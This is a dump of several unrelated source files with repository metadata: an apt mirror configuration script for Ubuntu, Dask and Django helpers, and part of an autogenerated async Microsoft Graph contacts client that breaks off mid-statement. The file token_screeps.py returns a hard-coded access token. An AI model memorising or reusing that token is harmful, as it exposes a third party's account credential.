[ "BSD-3-Clause" ]
null
null
null
open_source_mirror/ubuntu.py
fujiawei-dev/tookit-py
5ab3a18a41885f6166150cc27183621b96f8f991
[ "BSD-3-Clause" ]
null
null
null
""" Date: 2022.02.13 13:41 Description: Omit LastEditors: Rustle Karl LastEditTime: 2022.02.13 13:41 """ from enum import Enum from create_config_file.common import writer class Version(str, Enum): LTS1604 = "xenial" LTS1804 = "bionic" LTS2004 = "focal" def ubuntu(version=Version.LTS2004): """x86 amd64""" sources = open("/etc/apt/sources.list").read() for version in Version: if version in sources: break print(f"version: {version}") content = f"""deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ {version} main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ {version} main restricted universe multiverse deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ {version}-updates main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ {version}-updates main restricted universe multiverse deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ {version}-backports main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ {version}-backports main restricted universe multiverse deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ {version}-security main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ {version}-security main restricted universe multiverse""" conf = "/etc/apt/sources.list" writer( conf, content=content, read_only=False, official="https://mirrors.tuna.tsinghua.edu.cn/help/ubuntu/", ) def ubuntu_port(version=Version.LTS2004): """arm64 armhf ppc64el riscv64 s390x""" sources = open("/etc/apt/sources.list").read() for version in Version: if version in sources: break print(f"version: {version}") content = f"""deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ {version} main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ {version} main restricted universe multiverse deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ {version}-updates main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ {version}-updates main restricted universe multiverse deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ {version}-backports main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ {version}-backports main restricted universe multiverse deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ {version}-security main restricted universe multiverse # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ {version}-security main restricted universe multiverse""" conf = "/etc/apt/sources.list" writer( conf, content=content, read_only=False, official="https://mirrors.tuna.tsinghua.edu.cn/help/ubuntu-ports/", )
40.166667
118
0.728216
379
2,892
5.543536
0.189974
0.102808
0.137078
0.205616
0.871014
0.859591
0.859591
0.859591
0.859591
0.859591
0
0.022956
0.141425
2,892
71
119
40.732394
0.823198
0.048409
0
0.416667
0
0.333333
0.717996
0.030724
0
0
0
0
0
1
0.041667
false
0
0.041667
0
0.166667
0.041667
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
5a5c847c06a9e332c987001c361529b2ebc90702
160
py
Python
src/minimaldask/__init__.py
heikowagner/minimaldask
7b348776d012c86016c17af186f98f4ba8f6ac4e
[ "Apache-2.0" ]
2
2021-08-03T17:03:20.000Z
2021-11-28T03:07:36.000Z
src/minimaldask/__init__.py
heikowagner/minimaldask
7b348776d012c86016c17af186f98f4ba8f6ac4e
[ "Apache-2.0" ]
2
2021-04-07T14:56:58.000Z
2021-04-11T09:46:25.000Z
src/minimaldask/__init__.py
heikowagner/minimaldask
7b348776d012c86016c17af186f98f4ba8f6ac4e
[ "Apache-2.0" ]
5
2021-04-06T01:54:54.000Z
2021-11-28T03:31:30.000Z
from .kubernetes_helper import start_dask_cluster, delete_dask_cluster, update_or_deploy __all__ = [start_dask_cluster, delete_dask_cluster, update_or_deploy]
40
88
0.875
23
160
5.347826
0.521739
0.357724
0.260163
0.357724
0.764228
0.764228
0.764228
0.764228
0.764228
0
0
0
0.075
160
3
89
53.333333
0.831081
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
1
0
0
null
1
1
1
0
1
1
1
1
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
10
ce905ec86445403e13a9ec4a7abc09ff16b9ac73
67
py
Python
pythonCode/token_screeps.py
Ureimu/screeps-DataVisualization
59048381f371ae68412d85cd57300a415a40ae28
[ "Unlicense" ]
null
null
null
pythonCode/token_screeps.py
Ureimu/screeps-DataVisualization
59048381f371ae68412d85cd57300a415a40ae28
[ "Unlicense" ]
1
2020-08-28T12:38:19.000Z
2020-08-28T12:39:07.000Z
pythonCode/token_screeps.py
Ureimu/screeps-DataVisualization
59048381f371ae68412d85cd57300a415a40ae28
[ "Unlicense" ]
null
null
null
def get_token(): return "f805ec52-3e13-445f-b673-407a337f8e6f"
22.333333
49
0.746269
9
67
5.444444
1
0
0
0
0
0
0
0
0
0
0
0.372881
0.119403
67
2
50
33.5
0.457627
0
0
0
0
0
0.537313
0.537313
0
0
0
0
0
1
0.5
true
0
0
0.5
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
1
null
0
0
0
0
0
1
1
0
0
1
1
0
0
9
ce9716149c90d73c38b388d27620edede2db08ca
182
py
Python
apps/cpq/decorators.py
goztrk/django-htk
c56bf112e5d627780d2f4288460eae5cce80fa9e
[ "MIT" ]
206
2015-10-15T07:05:08.000Z
2021-02-19T11:48:36.000Z
apps/cpq/decorators.py
goztrk/django-htk
c56bf112e5d627780d2f4288460eae5cce80fa9e
[ "MIT" ]
8
2017-10-16T10:18:31.000Z
2022-03-09T14:24:27.000Z
apps/cpq/decorators.py
goztrk/django-htk
c56bf112e5d627780d2f4288460eae5cce80fa9e
[ "MIT" ]
61
2015-10-15T08:12:44.000Z
2022-03-10T12:25:06.000Z
# Django Imports from django.contrib.admin.views.decorators import staff_member_required def cpq_admin_required(*args, **kwargs): return staff_member_required(*args, **kwargs)
26
71
0.796703
24
182
5.791667
0.666667
0.158273
0.273381
0
0
0
0
0
0
0
0
0
0.104396
182
6
72
30.333333
0.852761
0.076923
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
true
0
0.333333
0.333333
1
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
1
1
0
0
8
ce9e21c63c3283a8b116fa5616b525157058487b
73,528
py
Python
msgraph-cli-extensions/v1_0/identitydirmgt_v1_0/azext_identitydirmgt_v1_0/vendored_sdks/identitydirmgt/aio/operations/_contacts_operations.py
thewahome/msgraph-cli
33127d9efa23a0e5f5303c93242fbdbb73348671
[ "MIT" ]
null
null
null
msgraph-cli-extensions/v1_0/identitydirmgt_v1_0/azext_identitydirmgt_v1_0/vendored_sdks/identitydirmgt/aio/operations/_contacts_operations.py
thewahome/msgraph-cli
33127d9efa23a0e5f5303c93242fbdbb73348671
[ "MIT" ]
22
2022-03-29T22:54:37.000Z
2022-03-29T22:55:27.000Z
msgraph-cli-extensions/v1_0/identitydirmgt_v1_0/azext_identitydirmgt_v1_0/vendored_sdks/identitydirmgt/aio/operations/_contacts_operations.py
thewahome/msgraph-cli
33127d9efa23a0e5f5303c93242fbdbb73348671
[ "MIT" ]
null
null
null
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from typing import Any, AsyncIterable, Callable, Dict, Generic, List, Optional, TypeVar, Union import warnings from azure.core.async_paging import AsyncItemPaged, AsyncList from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error from azure.core.pipeline import PipelineResponse from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest from azure.mgmt.core.exceptions import ARMErrorFormat from ... import models T = TypeVar('T') ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] class ContactsOperations: """ContactsOperations async operations. You should not instantiate this class directly. Instead, you should create a Client instance that instantiates it for you and attaches it as an attribute. :ivar models: Alias to model classes used in this operation group. :type models: ~identity_directory_management.models :param client: Client for service requests. :param config: Configuration of service client. :param serializer: An object model serializer. :param deserializer: An object model deserializer. """ models = models def __init__(self, client, config, serializer, deserializer) -> None: self._client = client self._serialize = serializer self._deserialize = deserializer self._config = config def list_direct_reports( self, org_contact_id: str, orderby: Optional[List[Union[str, "models.Enum6"]]] = None, select: Optional[List[Union[str, "models.Enum7"]]] = None, expand: Optional[List[str]] = None, **kwargs ) -> AsyncIterable["models.CollectionOfDirectoryObject"]: """Get directReports from contacts. Get directReports from contacts. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :param orderby: Order items by property values. :type orderby: list[str or ~identity_directory_management.models.Enum6] :param select: Select properties to be returned. :type select: list[str or ~identity_directory_management.models.Enum7] :param expand: Expand related entities. :type expand: list[str] :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either CollectionOfDirectoryObject or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_directory_management.models.CollectionOfDirectoryObject] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfDirectoryObject"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) accept = "application/json" def prepare_request(next_link=None): # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') if not next_link: # Construct URL url = self.list_direct_reports.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] if self._config.top is not None: query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0) if self._config.skip is not None: query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0) if self._config.search is not None: query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str') if self._config.filter is not None: query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str') if self._config.count is not None: query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool') if orderby is not None: query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',') if select is not None: query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',') if expand is not None: query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',') request = self._client.get(url, query_parameters, header_parameters) else: url = next_link query_parameters = {} # type: Dict[str, Any] request = self._client.get(url, query_parameters, header_parameters) return request async def extract_data(pipeline_response): deserialized = self._deserialize('CollectionOfDirectoryObject', pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.odata_next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: error = self._deserialize(models.OdataError, response) map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list_direct_reports.metadata = {'url': '/contacts/{orgContact-id}/directReports'} # type: ignore def list_ref_direct_reports( self, org_contact_id: str, orderby: Optional[List[Union[str, "models.Enum8"]]] = None, **kwargs ) -> AsyncIterable["models.CollectionOfLinksOfDirectoryObject"]: """Get ref of directReports from contacts. Get ref of directReports from contacts. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :param orderby: Order items by property values. :type orderby: list[str or ~identity_directory_management.models.Enum8] :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either CollectionOfLinksOfDirectoryObject or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_directory_management.models.CollectionOfLinksOfDirectoryObject] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfLinksOfDirectoryObject"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) accept = "application/json" def prepare_request(next_link=None): # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') if not next_link: # Construct URL url = self.list_ref_direct_reports.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] if self._config.top is not None: query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0) if self._config.skip is not None: query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0) if self._config.search is not None: query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str') if self._config.filter is not None: query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str') if self._config.count is not None: query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool') if orderby is not None: query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',') request = self._client.get(url, query_parameters, header_parameters) else: url = next_link query_parameters = {} # type: Dict[str, Any] request = self._client.get(url, query_parameters, header_parameters) return request async def extract_data(pipeline_response): deserialized = self._deserialize('CollectionOfLinksOfDirectoryObject', pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.odata_next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: error = self._deserialize(models.OdataError, response) map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list_ref_direct_reports.metadata = {'url': '/contacts/{orgContact-id}/directReports/$ref'} # type: ignore async def create_ref_direct_reports( self, org_contact_id: str, body: Dict[str, object], **kwargs ) -> Dict[str, object]: """Create new navigation property ref to directReports for contacts. Create new navigation property ref to directReports for contacts. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :param body: New navigation property ref value. :type body: dict[str, object] :keyword callable cls: A custom type or function that will be passed the direct response :return: dict mapping str to object, or the result of cls(response) :rtype: dict[str, object] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[Dict[str, object]] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.create_ref_direct_reports.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(body, '{object}') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [201]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize(models.OdataError, response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('{object}', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized create_ref_direct_reports.metadata = {'url': '/contacts/{orgContact-id}/directReports/$ref'} # type: ignore async def get_manager( self, org_contact_id: str, select: Optional[List[Union[str, "models.Enum9"]]] = None, expand: Optional[List[str]] = None, **kwargs ) -> "models.MicrosoftGraphDirectoryObject": """Get manager from contacts. Get manager from contacts. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :param select: Select properties to be returned. :type select: list[str or ~identity_directory_management.models.Enum9] :param expand: Expand related entities. :type expand: list[str] :keyword callable cls: A custom type or function that will be passed the direct response :return: MicrosoftGraphDirectoryObject, or the result of cls(response) :rtype: ~identity_directory_management.models.MicrosoftGraphDirectoryObject :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphDirectoryObject"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) accept = "application/json" # Construct URL url = self.get_manager.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] if select is not None: query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',') if expand is not None: query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') request = self._client.get(url, query_parameters, header_parameters) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize(models.OdataError, response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('MicrosoftGraphDirectoryObject', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get_manager.metadata = {'url': '/contacts/{orgContact-id}/manager'} # type: ignore async def get_ref_manager( self, org_contact_id: str, **kwargs ) -> str: """Get ref of manager from contacts. Get ref of manager from contacts. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :keyword callable cls: A custom type or function that will be passed the direct response :return: str, or the result of cls(response) :rtype: str :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[str] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) accept = "application/json" # Construct URL url = self.get_ref_manager.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') request = self._client.get(url, query_parameters, header_parameters) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize(models.OdataError, response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('str', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get_ref_manager.metadata = {'url': '/contacts/{orgContact-id}/manager/$ref'} # type: ignore async def set_ref_manager( self, org_contact_id: str, body: Dict[str, object], **kwargs ) -> None: """Update the ref of navigation property manager in contacts. Update the ref of navigation property manager in contacts. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :param body: New navigation property ref values. :type body: dict[str, object] :keyword callable cls: A custom type or function that will be passed the direct response :return: None, or the result of cls(response) :rtype: None :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[None] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.set_ref_manager.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(body, '{object}') body_content_kwargs['content'] = body_content request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [204]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize(models.OdataError, response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) if cls: return cls(pipeline_response, None, {}) set_ref_manager.metadata = {'url': '/contacts/{orgContact-id}/manager/$ref'} # type: ignore async def delete_ref_manager( self, org_contact_id: str, if_match: Optional[str] = None, **kwargs ) -> None: """Delete ref of navigation property manager for contacts. Delete ref of navigation property manager for contacts. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :param if_match: ETag. :type if_match: str :keyword callable cls: A custom type or function that will be passed the direct response :return: None, or the result of cls(response) :rtype: None :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[None] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) accept = "application/json" # Construct URL url = self.delete_ref_manager.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] # Construct headers header_parameters = {} # type: Dict[str, Any] if if_match is not None: header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') request = self._client.delete(url, query_parameters, header_parameters) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [204]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize(models.OdataError, response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) if cls: return cls(pipeline_response, None, {}) delete_ref_manager.metadata = {'url': '/contacts/{orgContact-id}/manager/$ref'} # type: ignore def list_member_of( self, org_contact_id: str, orderby: Optional[List[Union[str, "models.Enum10"]]] = None, select: Optional[List[Union[str, "models.Enum11"]]] = None, expand: Optional[List[str]] = None, **kwargs ) -> AsyncIterable["models.CollectionOfDirectoryObject0"]: """Get memberOf from contacts. Get memberOf from contacts. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :param orderby: Order items by property values. :type orderby: list[str or ~identity_directory_management.models.Enum10] :param select: Select properties to be returned. :type select: list[str or ~identity_directory_management.models.Enum11] :param expand: Expand related entities. :type expand: list[str] :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either CollectionOfDirectoryObject0 or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_directory_management.models.CollectionOfDirectoryObject0] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfDirectoryObject0"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) accept = "application/json" def prepare_request(next_link=None): # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') if not next_link: # Construct URL url = self.list_member_of.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] if self._config.top is not None: query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0) if self._config.skip is not None: query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0) if self._config.search is not None: query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str') if self._config.filter is not None: query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str') if self._config.count is not None: query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool') if orderby is not None: query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',') if select is not None: query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',') if expand is not None: query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',') request = self._client.get(url, query_parameters, header_parameters) else: url = next_link query_parameters = {} # type: Dict[str, Any] request = self._client.get(url, query_parameters, header_parameters) return request async def extract_data(pipeline_response): deserialized = self._deserialize('CollectionOfDirectoryObject0', pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.odata_next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: error = self._deserialize(models.OdataError, response) map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list_member_of.metadata = {'url': '/contacts/{orgContact-id}/memberOf'} # type: ignore def list_ref_member_of( self, org_contact_id: str, orderby: Optional[List[Union[str, "models.Enum12"]]] = None, **kwargs ) -> AsyncIterable["models.CollectionOfLinksOfDirectoryObject0"]: """Get ref of memberOf from contacts. Get ref of memberOf from contacts. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :param orderby: Order items by property values. :type orderby: list[str or ~identity_directory_management.models.Enum12] :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either CollectionOfLinksOfDirectoryObject0 or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_directory_management.models.CollectionOfLinksOfDirectoryObject0] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfLinksOfDirectoryObject0"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) accept = "application/json" def prepare_request(next_link=None): # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') if not next_link: # Construct URL url = self.list_ref_member_of.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] if self._config.top is not None: query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0) if self._config.skip is not None: query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0) if self._config.search is not None: query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str') if self._config.filter is not None: query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str') if self._config.count is not None: query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool') if orderby is not None: query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',') request = self._client.get(url, query_parameters, header_parameters) else: url = next_link query_parameters = {} # type: Dict[str, Any] request = self._client.get(url, query_parameters, header_parameters) return request async def extract_data(pipeline_response): deserialized = self._deserialize('CollectionOfLinksOfDirectoryObject0', pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.odata_next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: error = self._deserialize(models.OdataError, response) map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list_ref_member_of.metadata = {'url': '/contacts/{orgContact-id}/memberOf/$ref'} # type: ignore async def create_ref_member_of( self, org_contact_id: str, body: Dict[str, object], **kwargs ) -> Dict[str, object]: """Create new navigation property ref to memberOf for contacts. Create new navigation property ref to memberOf for contacts. :param org_contact_id: key: id of orgContact. :type org_contact_id: str :param body: New navigation property ref value. :type body: dict[str, object] :keyword callable cls: A custom type or function that will be passed the direct response :return: dict mapping str to object, or the result of cls(response) :rtype: dict[str, object] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[Dict[str, object]] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.create_ref_member_of.metadata['url'] # type: ignore path_format_arguments = { 'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(body, '{object}') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [201]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize(models.OdataError, response) raise 